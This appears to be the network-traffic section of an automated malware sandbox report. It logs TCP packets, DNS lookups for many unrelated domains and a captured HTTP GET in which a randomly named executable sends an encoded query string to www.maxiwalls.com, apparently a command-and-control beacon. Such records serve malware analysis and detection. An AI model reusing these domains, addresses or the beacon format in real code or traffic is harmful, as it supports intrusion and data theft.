                                                                                                                                                                                                        May 8, 2024 18:21:29.612612963 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612612009 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.612715006 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.617027998 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.941541910 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:35.247504950 CEST4975380192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:35.554980993 CEST804975313.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:35.555124044 CEST4975380192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:35.859971046 CEST804975313.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:35.860001087 CEST804975313.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:35.860016108 CEST804975313.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:35.860047102 CEST4975380192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:35.860097885 CEST4975380192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:37.061719894 CEST4975380192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:38.224852085 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:38.534141064 CEST804975413.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:38.535828114 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:38.846520901 CEST804975413.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:38.846544981 CEST804975413.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:38.846636057 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:38.846775055 CEST804975413.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:38.846828938 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:40.923737049 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:41.233128071 CEST804975413.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:41.390058041 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:42.409518957 CEST4975580192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:42.719527960 CEST804975513.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:42.719619036 CEST4975580192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:43.029484034 CEST804975513.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:43.029504061 CEST804975513.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:43.029601097 CEST4975580192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:43.029733896 CEST804975513.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:43.029906034 CEST4975580192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:44.233632088 CEST4975580192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:45.253735065 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:45.565026999 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:45.565157890 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:45.874420881 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:45.874439955 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:45.874566078 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:45.874666929 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:45.874710083 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:51.388602018 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:51.722870111 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:51.725908041 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:51.727742910 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:52.060770035 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:52.061665058 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:52.061758041 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:52.061805964 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:53.217915058 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:53.233659029 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:53.528212070 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:54.252517939 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:54.585637093 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:54.585746050 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:54.616086960 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:54.951919079 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:54.953469038 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:54.953488111 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:54.953669071 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:57.959145069 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:58.972132921 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:59.308811903 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:59.311846972 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:59.315776110 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:59.651988983 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:59.652019978 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:59.653203964 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:59.653513908 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:59.653666019 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:22:00.827383041 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:23:01.361248970 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.367810011 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.713557959 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713579893 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713627100 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713777065 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713798046 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.713932991 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713947058 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713958979 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713968992 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.713973045 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.714062929 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.714102983 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.714119911 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.714214087 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:02.874368906 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:03.895807028 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.239061117 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.239150047 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.241189957 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.584356070 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584686995 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584809065 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584858894 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.584878922 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584898949 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584914923 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584983110 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.584997892 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.588560104 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.931736946 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.288656950 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.603955030 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.604053974 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.606301069 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.920547962 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.977943897 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.977967024 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978015900 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.978029013 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978041887 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978055000 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978068113 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978081942 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.978094101 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978102922 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.978112936 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978125095 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978137016 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978147030 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.978197098 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:20.292618990 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:20.292645931 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:20.292788982 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:21.108935118 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.129841089 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.444251060 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.447928905 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.451828003 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.764202118 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864010096 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864037037 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864049911 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864075899 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864090919 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864111900 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864125013 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864140987 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864155054 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864167929 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864166021 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.864239931 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.864239931 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:23.176656008 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:23.176682949 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:23.176731110 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:23.952476025 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:24.977837086 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.289747000 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.289836884 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.293934107 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.604665995 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604693890 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604705095 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604717016 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604728937 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604739904 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604758978 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649450064 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649569035 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649611950 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.649719000 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649734020 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649746895 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649763107 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649776936 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.649785995 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649801970 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649806976 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.649816036 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649835110 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.649837971 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649879932 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.960336924 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        May 8, 2024 18:20:40.192984104 CEST192.168.2.41.1.1.10x4e40Standard query (0)www.maxiwalls.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:20:56.377676964 CEST192.168.2.41.1.1.10x5500Standard query (0)www.choosejungmann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:04.862536907 CEST192.168.2.41.1.1.10x3e1Standard query (0)www.paydayloans3.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:19.226341963 CEST192.168.2.41.1.1.10x11a7Standard query (0)www.colchondealquiler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:34.627772093 CEST192.168.2.41.1.1.10x1ae3Standard query (0)www.www60270.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:50.893718958 CEST192.168.2.41.1.1.10xd332Standard query (0)www.skibinscy-finanse.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:07.535444021 CEST192.168.2.41.1.1.10xd03aStandard query (0)www.avoshield.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:16.482281923 CEST192.168.2.41.1.1.10x267eStandard query (0)www.fairmarty.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:30.565635920 CEST192.168.2.41.1.1.10xe70eStandard query (0)www.theertyuiergthjk.homesA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:35.032275915 CEST192.168.2.41.1.1.10xb9faStandard query (0)www.theertyuiergthjk.homesA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:40.206439972 CEST192.168.2.41.1.1.10x5eabStandard query (0)www.aprovapapafox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:54.114023924 CEST192.168.2.41.1.1.10x8b8dStandard query (0)www.83634.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.109824896 CEST192.168.2.41.1.1.10x8b8dStandard query (0)www.83634.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:09.600367069 CEST192.168.2.41.1.1.10x2268Standard query (0)www.polhi.lolA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:17.863058090 CEST192.168.2.41.1.1.10x33c4Standard query (0)www.valentinaetommaso.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:18.874846935 CEST192.168.2.41.1.1.10x33c4Standard query (0)www.valentinaetommaso.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:34.584978104 CEST192.168.2.41.1.1.10xf8a9Standard query (0)www.toyzonetshirts.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:42.832598925 CEST192.168.2.41.1.1.10xe198Standard query (0)www.solesense.proA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:58.613964081 CEST192.168.2.41.1.1.10xe8b8Standard query (0)www.onitsuka-ksa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        May 8, 2024 18:20:40.642802000 CEST1.1.1.1192.168.2.40x4e40No error (0)www.maxiwalls.com79.98.25.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:20:56.545008898 CEST1.1.1.1192.168.2.40x5500Name error (3)www.choosejungmann.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:05.035909891 CEST1.1.1.1192.168.2.40x3e1No error (0)www.paydayloans3.shop64.190.62.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:19.747299910 CEST1.1.1.1192.168.2.40x11a7No error (0)www.colchondealquiler.com217.76.128.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:35.244816065 CEST1.1.1.1192.168.2.40x1ae3No error (0)www.www60270.xyzfix01.pfw.djamxtvyk.cloudland3.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:35.244816065 CEST1.1.1.1192.168.2.40x1ae3No error (0)fix01.pfw.djamxtvyk.cloudland3.com13.94.60.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:51.386219025 CEST1.1.1.1192.168.2.40xd332No error (0)www.skibinscy-finanse.pl178.211.137.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:07.728657007 CEST1.1.1.1192.168.2.40xd03aName error (3)www.avoshield.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:16.925327063 CEST1.1.1.1192.168.2.40x267eNo error (0)www.fairmarty.top203.161.46.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:30.734927893 CEST1.1.1.1192.168.2.40xe70eName error (3)www.theertyuiergthjk.homesnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:35.199683905 CEST1.1.1.1192.168.2.40xb9faName error (3)www.theertyuiergthjk.homesnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:40.495079994 CEST1.1.1.1192.168.2.40x5eabNo error (0)www.aprovapapafox.comaprovapapafox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:40.495079994 CEST1.1.1.1192.168.2.40x5eabNo error (0)aprovapapafox.com162.240.81.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.266092062 CEST1.1.1.1192.168.2.40x8b8dNo error (0)www.83634.cnsxp92m4v.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.266092062 CEST1.1.1.1192.168.2.40x8b8dNo error (0)sxp92m4v.as22566.comvf3ba6qx.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.266092062 CEST1.1.1.1192.168.2.40x8b8dNo error (0)vf3ba6qx.as22566.com103.93.125.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.273056984 CEST1.1.1.1192.168.2.40x8b8dNo error (0)www.83634.cnsxp92m4v.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.273056984 CEST1.1.1.1192.168.2.40x8b8dNo error (0)sxp92m4v.as22566.comvf3ba6qx.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.273056984 CEST1.1.1.1192.168.2.40x8b8dNo error (0)vf3ba6qx.as22566.com103.93.125.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:09.790380001 CEST1.1.1.1192.168.2.40x2268Name error (3)www.polhi.lolnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283178091 CEST1.1.1.1192.168.2.40x33c4No error (0)www.valentinaetommaso.itmatrimoniovalentinaetommaso.webnode.itCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283178091 CEST1.1.1.1192.168.2.40x33c4No error (0)matrimoniovalentinaetommaso.webnode.itlb.webnode.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283178091 CEST1.1.1.1192.168.2.40x33c4No error (0)lb.webnode.io3.73.27.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283178091 CEST1.1.1.1192.168.2.40x33c4No error (0)lb.webnode.io3.125.172.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283200026 CEST1.1.1.1192.168.2.40x33c4No error (0)www.valentinaetommaso.itmatrimoniovalentinaetommaso.webnode.itCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283200026 CEST1.1.1.1192.168.2.40x33c4No error (0)matrimoniovalentinaetommaso.webnode.itlb.webnode.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283200026 CEST1.1.1.1192.168.2.40x33c4No error (0)lb.webnode.io3.73.27.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283200026 CEST1.1.1.1192.168.2.40x33c4No error (0)lb.webnode.io3.125.172.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:34.751023054 CEST1.1.1.1192.168.2.40xf8a9Name error (3)www.toyzonetshirts.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:43.319794893 CEST1.1.1.1192.168.2.40xe198No error (0)www.solesense.proparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:43.319794893 CEST1.1.1.1192.168.2.40xe198No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:58.780273914 CEST1.1.1.1192.168.2.40xe8b8Name error (3)www.onitsuka-ksa.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        • www.maxiwalls.com
                                                                                                                                                                                                        • www.paydayloans3.shop
                                                                                                                                                                                                        • www.colchondealquiler.com
                                                                                                                                                                                                        • www.skibinscy-finanse.pl
                                                                                                                                                                                                        • www.fairmarty.top
                                                                                                                                                                                                        • www.aprovapapafox.com
                                                                                                                                                                                                        • www.83634.cn
                                                                                                                                                                                                        • www.valentinaetommaso.it
                                                                                                                                                                                                        • www.solesense.pro
Session ID: 0
Source IP: 192.168.2.4
Source Port: 49743
Destination IP: 79.98.25.1
Destination Port: 80
PID: 4500
Process: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe

Timestamp: May 8, 2024 18:20:40.991636992 CEST
Bytes transferred: 478
Direction: OUT
Data:
GET /aleu/?jn4lNb=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&jvudu=jXz4lVThP2GL4N HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.maxiwalls.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36

Timestamp: May 8, 2024 18:20:41.326205015 CEST
Bytes transferred: 1289
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Wed, 08 May 2024 16:20:41 GMT
Server: Apache
Cache-control: max-age=300
Vary: Accept-Encoding
Content-Length: 5662
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49745 | 64.190.62.22 | 80 | 4500 | C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
Timestamp | Bytes transferred | Direction | Data
